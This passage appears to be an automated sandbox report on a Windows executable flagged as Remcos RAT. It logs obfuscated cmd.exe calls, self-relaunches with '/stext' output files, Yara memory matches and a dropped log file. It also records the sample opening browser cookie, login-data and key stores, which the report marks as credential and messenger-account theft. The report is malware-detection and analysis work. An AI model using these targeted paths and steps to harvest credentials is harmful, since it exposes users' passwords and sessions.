              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\lmosdawqehkmlcbfmkivthwvnjpkkkqrhv"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\wotkesh"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"Jump to behavior
              Source: asXlZG3aW6.exe, 00000082.00000003.21794019954.00000000052CA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269848899.00000000052D9000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernutes }
              Source: asXlZG3aW6.exe, 00000082.00000003.21794019954.00000000052CA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21784839401.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793019950.00000000052CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managermazon.com"},{"
              Source: asXlZG3aW6.exe, 00000082.00000002.26269543770.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerA
              Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerinutes }
              Source: asXlZG3aW6.exe, 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269848899.00000000052D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: asXlZG3aW6.exe, 00000082.00000002.26269543770.0000000005248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerR
              Source: asXlZG3aW6.exe, 00000082.00000003.21794019954.00000000052CA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21776966540.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21784839401.00000000052DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager,{"applied_pol
              Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B2933 cpuid 130_2_367B2933
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,130_2_367B2264
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,132_2_004082CD
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21777083214.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21785310662.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21784839401.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269787785.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947522575.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947642663.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21793113422.00000000052B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: asXlZG3aW6.exe PID: 4464, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Instant Messenger accounts or passwords
